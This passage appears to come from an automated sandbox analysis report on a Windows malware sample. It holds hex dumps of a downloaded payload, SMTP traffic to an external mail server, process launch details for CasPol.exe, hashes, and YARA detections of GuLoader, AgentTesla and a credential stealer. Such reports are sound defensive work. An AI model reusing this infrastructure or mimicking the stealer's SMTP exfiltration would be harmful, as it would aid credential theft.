f9 d8 04 95 d7 d6 f7 ed 27 bf 19 08 f2 58 32 6b 29 e5 3b 5d 31 ea c7 f9 0f da 53 c1 3e 0b 7f e9 4c dd 69 a6 8e ea 1a 46 2e ad 08 ef af 21 ba 96 fa
                                            Data Ascii: R_. #D}{N31=;9%0E-ub,?L|%7:.bo@<iZiJ/tMU"h'%rN|]lf'hej:itN'e`V<:ZfZl?2iQ}'X2k);]1S>LiF.!
                                            2021-11-22 13:23:12 UTC216INData Raw: d6 b1 89 72 20 a3 4b 9e d6 4a 89 09 5b a7 13 cb 6d 18 7e 84 3a 29 13 5b a6 20 b0 2b ac b8 bc c7 dc 74 5c 1c d8 af 9c e7 76 04 b2 51 0a 05 34 cc b5 58 33 c8 a3 95 0b 05 ec 4d 36 5d 02 fc 8f 7a 20 fe 45 da 69 b7 33 66 b1 1d 40 de fa 6d cf ef 0a a3 c4 93 00 d0 b5 2b 74 0f ba 3d a3 54 17 1f fc da 1b 5f 5c 03 36 35 18 84 f1 d4 00 a1 97 fc 1a 11 4f 45 68 c5 b9 d7 c0 38 86 22 67 52 75 44 96 d7 7f b0 fb 56 4c f6 36 fe 9f 5a 98 c3 53 15 2b 48 05 d4 75 e2 e9 0a a7 1d a9 92 f6 19 b6 37 6e 9f a6 03 39 03 5d 6c bd 63 14 60 a6 6a 5b 1f d5 1c 2f 57 96 2f 22 ab f2 09 1d b4 c7 0a f2 59 30 6a 92 a3 16 8b fe a4 af 8d 78 67 ea bd 3e 26 5f 0a 47 a6 d1 ca 50 c0 d0 3c e3 4f 5c 0e e1 ca 34 9b c2 35 cd b1 76 a1 7d b1 35 ec 8c f5 74 3f cf 82 c2 b0 76 0a 4f a0 c0 8b b3 2e 5b f1 39
                                            Data Ascii: r KJ[m~:)[ +t\vQ4X3M6]z Ei3f@m+t=T_\65OEh8"gRuDVL6ZS+Hu7n9]lc`j[/W/"Y0jxg>&_GP<O\45v}5t?vO.[9
                                            2021-11-22 13:23:12 UTC218INData Raw: bb 0c 16 ac 12 cd c6 dd 2f f5 f5 3a f7 67 01 47 af 0c 93 68 ae ac 66 49 5f 70 1b 9d c9 3e fb 1d c1 88 e4 80 d1 59 0f 30 5a b2 59 1d 98 51 3a 07 67 dd e7 f3 c1 1a c8 b5 0d 73 6f ef 88 87 b5 7e c1 d4 bb 03 d5 6c 08 33 e3 05 27 91 c5 91 69 41 a8 8c c4 79 e8 65 5c d8 83 3d 92 f4 04 b1 46 7a 00 5d 90 7c 71 a0 bc f3 de 1f e9 cd cf 6f 26 0b 83 57 08 c6 8b c0 86 36 e2 ba 83 b5 5a 66 ec e5 ae 0c 95 d6 d4 e3 e1 3d b3 06 81 c3 57 20 e9 c3 fe 3e 57 7f f0 d5 e4 17 7b ca d5 3e 0b a6 fd 4c dc 1c ab 9b 6c 58 5d 3e 30 8c f2 a7 2f 26 d0 fe 2f 4a cf 58 0f 22 04 b5 b7 69 6f 97 8a 0b e3 22 ed bf e0 49 2e f8 c0 47 f2 2c b6 42 f6 4b ce 02 ae a5 c0 b9 04 a6 d2 39 68 19 d5 f5 be 76 7e 96 4d 07 86 35 ec 50 ab b8 09 2c ee 44 11 1a 23 50 59 2f d5 0d bb 3f 42 65 10 03 f8 ed e4 4d 90
                                            Data Ascii: /:gGhfI_p>Y0ZYQ:gso~l3'iAye\=Fz]|qo&W6Zf=W >W{>LlX]>0/&/JX"io"I.G,BK9hv~M5P,D#PY/?BeM
                                            2021-11-22 13:23:12 UTC219INData Raw: f8 07 a3 dd b6 09 cf ba 39 62 8b 14 37 b9 dd 17 1d fc da 02 d6 c9 18 2d 22 33 81 eb 48 97 a1 95 e8 05 1c c6 e7 78 54 b9 d7 cd 18 8e 37 c6 57 7e 67 9f c2 6f 39 73 d4 df 66 bd 7b 9d 4e 0b 7d d9 3e 2f 4b 06 d5 c9 ee 6f 96 b3 96 22 93 f0 10 a3 23 f0 1b a8 0b 30 0b 46 ee 34 6d 04 60 af 68 50 0f c9 0e b3 52 82 8d 25 a4 75 04 17 a5 a5 8a 36 5f 51 6b a0 b2 a4 0a d5 a3 ad 88 7d 66 e7 a8 26 2b c3 a6 47 a7 c7 cb 46 d7 ce 3c ec 54 49 1a e1 c6 30 87 d6 a9 60 95 6a ad f8 17 21 eb 85 e7 62 3e f2 9f dd a7 7f 11 5f a1 c1 86 b9 22 55 ff b5 76 e5 1e c7 70 7c 71 c8 4a 43 49 1d ad c1 2c 60 26 22 0f 8c 9b 0c 2a 51 3c bf 30 97 87 23 45 66 0e 07 29 9a c6 e4 b6 93 dd 44 16 c1 9a fc ac 79 89 9b f8 58 d9 cc 77 5b ad a2 cb 14 26 fb 86 51 86 0b bc c8 b9 60 56 0f ee cb c9 1f 90 5e a9
                                            Data Ascii: 9b7-"3HxT7W~go9sf{N}>/Ko"#0F4m`hPR%u6_Qk}f&+GF<TI0`j!b>_"Uvp|qJCI,`&"*Q<0#Ef)DyXw[&Q`V^
                                            2021-11-22 13:23:12 UTC220INData Raw: 5c a6 84 d9 77 e1 45 58 d9 92 bd 7a fa 0a bf 4e 7d 06 54 99 74 7b a8 b4 db d9 0d e1 d8 dd ee bf 0a 91 d7 e4 d3 99 41 1f 37 f0 3a 6f b2 50 6f fe 64 db 0e 92 d1 de ea e8 3a ba 17 00 fa 5e 32 69 2f f8 3e 55 78 ed d0 ec 1d 5b ca c0 2c 8a 3f fc 5e 5c f0 a7 9c 6b 5a 53 3c 2c 91 ee ba 33 3b d2 f9 2f 48 ce 56 1e a3 3d b2 97 6b 6d 85 0a e7 ed 2b cd bd e2 5b ae 14 d2 c7 27 20 b1 44 eb 4e c4 00 bc 25 15 a4 01 ae d5 19 6a 13 df e4 3d a7 74 b6 4e 06 96 b5 29 41 28 61 2b 29 ee c6 03 10 29 57 66 2c d7 8f a9 be 77 6c 30 01 fa ff 64 a1 80 3a 4d 11 4a bc 10 59 71 7d ef 74 33 0e 19 3b 98 0e 76 e3 6a 04 fd f5 d3 73 7f 98 cd a9 e7 a8 6f ad 1d 53 d3 2c 08 8d 72 f3 b7 1f e1 b8 03 e3 15 d2 65 1d 87 e2 72 ec 27 79 69 61 88 ee 56 d8 83 4a ff 14 ba 7b 8f 76 29 9e ca ab 88 de b3 c7
                                            Data Ascii: \wEXzN}Tt{A7:oPod:^2i/>Ux[,?^\kZS<,3;/HV=km+[' DN%j=tN)A(a+))Wf,wl0d:MJYq}t3;vjsoS,rer'yiaVJ{v)
                                            2021-11-22 13:23:12 UTC221INData Raw: 9c 18 e0 14 80 23 18 28 6c cf 1c 47 28 13 c8 07 25 7a a4 7a c8 36 c1 d5 42 da 05 78 70 c6 b8 c6 3b 29 55 07 b5 de f0 7c 82 cf 86 ad 12 08 ab db 55 58 b4 cb 3d 98 fb a3 33 8b af 57 81 3b 27 3b cb a4 51 ea a0 d0 47 9a 55 bd f7 35 11 cc ad db 5f 07 c0 f1 a5 ca 17 68 31 c9 b9 e7 e1 54 3a 9b 58 1b 85 79 a2 11 c6 7d c4 6d 61 74 38 83 87 55 25 46 4a 78 f8 ea 68 11 41 33 95 17 ad b5 52 2a 16 73 7b 68 fc aa 8b 8b 9b d9 69 bd a5 fb 0b c0 1f ec f1 8f 74 55 5b 72 53 b0 a7 c3 1c 21 f8 9b 54 9b 0e ae a1 b1 67 55 12 eb d9 4d 12 98 56 ae 46 38 c5 e6 5f 2d 93 d1 03 21 aa 5f ea d8 6e 38 1f 04 fb a6 4e f3 aa 5d 17 8c ee 9f fa 45 70 1d 5f b6 78 2c ee 80 e3 fc 99 b4 e2 1f 22 35 33 a6 e7 dc 16 90 ee 40 4a ac 3e 8e fb 3c a1 63 e3 d2 87 56 fc 7d dc 69 cf 73 82 3f f0 20 35 bd 24
                                            Data Ascii: #(lG(%zz6Bxp;)U|UX=3W;';QGU5_h1T:Xy}mat8U%FJxhA3R*s{hitU[rS!TgUMVF8_-!_n8N]Ep_x,"53@J><cV}is? 5$


                                            SMTP Packets

                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Nov 22, 2021 14:24:48.914383888 CET5874978354.36.109.179192.168.11.20220-server.enfoque-ti.com ESMTP Exim 4.94.2 #2 Mon, 22 Nov 2021 14:24:48 +0100
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Nov 22, 2021 14:24:48.914989948 CET49783587192.168.11.2054.36.109.179EHLO 878411
                                            Nov 22, 2021 14:24:48.925404072 CET5874978354.36.109.179192.168.11.20250-server.enfoque-ti.com Hello 878411 [102.129.143.99]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPE_CONNECT
                                            250-STARTTLS
                                            250 HELP
                                            Nov 22, 2021 14:24:48.925734043 CET49783587192.168.11.2054.36.109.179STARTTLS
                                            Nov 22, 2021 14:24:48.938354969 CET5874978354.36.109.179192.168.11.20220 TLS go ahead

                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:14:22:44
                                            Start date:22/11/2021
                                            Path:C:\Users\user\Desktop\n#U00ba410000512664.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\n#U00ba410000512664.exe"
                                            Imagebase:0x400000
                                            File size:192512 bytes
                                            MD5 hash:7C91DB57C98A1F0E38BA65ED651B4779
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Visual Basic
                                            Reputation:low

                                            General

                                            Start time:14:22:59
                                            Start date:22/11/2021
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\n#U00ba410000512664.exe"
                                            Imagebase:0x8d0000
                                            File size:108664 bytes
                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.777892821.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:14:23:00
                                            Start date:22/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61e020000
                                            File size:875008 bytes
                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Disassembly

                                            Code Analysis

                                            Reset < >